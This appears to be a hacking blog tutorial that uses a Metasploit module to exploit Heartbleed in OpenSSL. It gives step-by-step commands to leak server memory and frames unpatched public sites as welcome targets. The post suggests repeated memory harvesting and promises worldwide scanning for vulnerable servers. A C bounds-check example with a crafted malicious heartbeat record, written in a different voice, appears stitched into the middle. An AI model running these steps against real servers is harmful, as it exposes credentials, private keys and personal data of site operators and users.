
Hacking the Heartbleed Vulnerability

Welcome back, my greenhorn hackers! In recent weeks, the Heartbleed vulnerability of OpenSSL has been dominating the information security headlines. This vulnerability enables an attacker to extract data from the server’s memory that may contain authentication credentials, cookies, the server’s private key, and personally identifiable information (PII) that could be used for identity theft. As a result, websites around the world have been scrambling to close this hole. Fortunately for us, many still have not, and many may never be closed.

OpenSSL is a widely used cryptography library that implements TLS, the protocol behind HTTPS (secure HTTP). The idea is that any data traveling over this secured version of HTTP should be encrypted and protected. TLS also has a “heartbeat” extension: one side sends a small payload and the other echoes it back, which verifies that the data was received correctly and that the connection is still alive. It’s kind of like one machine telling the other, “Yes, I got that data and you can send more now.”

The Heartbleed vulnerability lets an attacker trick OpenSSL by sending a heartbeat request that carries a single byte of payload while declaring that it sent 64K bytes. An unpatched server never compares that declared length with what actually arrived, so it echoes back 64K bytes: the one byte it received plus roughly 64K of whatever happened to be sitting next to it in the server’s memory.
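To make that length mismatch concrete, here is the heartbeat record layout and the bounds check that patched OpenSSL performs before echoing anything, as an added C example that is neither the post's code nor OpenSSL's own source; the two sample records are constructed, and the function and constant names are my own.

```c
#include <stddef.h>
#include <string.h>

/* TLS heartbeat message (RFC 6520): byte 0 = type (1 request, 2 response),
 * bytes 1-2 = payload_length (big-endian), then payload_length bytes of
 * payload, then at least 16 bytes of random padding. */
#define HB_HEADER_LEN  3
#define HB_MIN_PADDING 16
#define HB_REQUEST     1

/* The bounds check the Heartbleed fix added: header + declared payload +
 * minimum padding must fit inside the bytes that actually arrived.
 * Returns 1 and stores the declared length in *payload_len, else 0. */
int heartbeat_length_ok(const unsigned char *rec, size_t rec_len, size_t *payload_len)
{
    if (rec == NULL || rec_len < HB_HEADER_LEN + HB_MIN_PADDING || rec[0] != HB_REQUEST)
        return 0;
    size_t declared = ((size_t)rec[1] << 8) | rec[2];
    /* Vulnerable OpenSSL trusted `declared` and copied that many bytes out of
     * the record buffer, reading past its end into adjacent heap memory. */
    if (HB_HEADER_LEN + declared + HB_MIN_PADDING > rec_len)
        return 0;
    *payload_len = declared;
    return 1;
}

/* Build the echo response from validated bytes only. Returns bytes written,
 * or 0 when the request is rejected or `out` is too small. */
size_t heartbeat_response(const unsigned char *req, size_t req_len,
                          unsigned char *out, size_t out_cap)
{
    size_t plen, need;
    if (!heartbeat_length_ok(req, req_len, &plen))
        return 0;
    need = HB_HEADER_LEN + plen + HB_MIN_PADDING;
    if (out_cap < need)
        return 0;
    out[0] = 2;                                  /* heartbeat_response */
    out[1] = (unsigned char)(plen >> 8);
    out[2] = (unsigned char)(plen & 0xff);
    memcpy(out + HB_HEADER_LEN, req + HB_HEADER_LEN, plen); /* echo exactly plen bytes */
    memset(out + HB_HEADER_LEN + plen, 0, HB_MIN_PADDING);  /* real TLS uses random padding */
    return need;
}

/* Constructed sample records (not captured traffic): a well-formed request with
 * 4 payload bytes, and the pattern the post describes: 1 byte sent, 0x4000 claimed. */
const unsigned char GOOD_REQ[HB_HEADER_LEN + 4 + HB_MIN_PADDING] = { HB_REQUEST, 0x00, 0x04, 'p', 'i', 'n', 'g' };
const unsigned char BAD_REQ[HB_HEADER_LEN + 1 + HB_MIN_PADDING]  = { HB_REQUEST, 0x40, 0x00, 'x' };
```

The same comparison, applied to the heartbeat record rather than to the declared length alone, is what an IDS signature for Heartbleed probes keys on.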

In this tutorial, I’ll show you a simple exploit for getting OpenSSL to spill the contents of its memory and possibly hand us the user’s credentials and other information.

Step 1: Update Metasploit

The first step is to update Metasploit to get the new auxiliary module for Heartbleed. Type:

  • kali > msfupdate

Metasploit will then go through the long and slow process of updating its modules and framework. Be patient here; it takes a while.

When you are finally returned to the Kali prompt, the update has completed.

Step 2: Start Metasploit

Now, we need to start the Metasploit console. At any terminal prompt, type:

  • kali > msfconsole

You should be greeted with a screen like that below.

Step 3: Find Heartbleed

Now, we need to find the new Heartbleed module. We can use the built-in search feature in Metasploit. Type:

  • search heartbleed

This should bring up two auxiliary modules for Heartbleed. Select the first one as I’ve highlighted below.

Step 4: Use Auxiliary Module

Next, we need to load this module. Simply type:

  • use auxiliary/scanner/ssl/openssl_heartbleed

This will load the Heartbleed module.

Whenever I am using a new module, I like to look at the info page. Once we have loaded the module, type:

  • msf > info

As we can see in the screenshot below, this reveals the options that need to be set in order to use this module, along with a description of the module.

Step 5: Set Options

Although this module has numerous options, the critical one is RHOSTS (notice the plural here). Let’s set it to a target website I set up on my network that is still vulnerable to Heartbleed.

  • msf > set RHOSTS 192.168.1.169

Step 6: Run the Module

Finally, set the option “verbose” to “true”. This will provide us with verbose output.

  • msf > set verbose true

And now let’s run it:

  • msf > run

As you can see in the screenshot below, the server leaked about 64K bytes of what was in its memory.

Step 7: Success

If credentials, personally identifiable information (PII), or the server’s private key had been in memory, they would have leaked out as well. Of course, we could set up this Heartbleed scanner to run repeatedly to gather the info in memory on a continual basis, eventually gaining access to all the info that traversed RAM.

In my next Heartbleed post, we will start working on a scanner script to scan the world for websites and servers still vulnerable to the Heartbleed vulnerability, so make sure to come back. While you’re waiting, you can use your spare time to increase your skills in Metasploit by learning all of the commands and hacking scripts available.


About The Author

He is the brain behind thenexthack.com. He started this platform as a one man army to bring news from the dark side or call it the hidden side of the Internet. He is a security researcher with an interest in cyber attacks, politics, and sport.
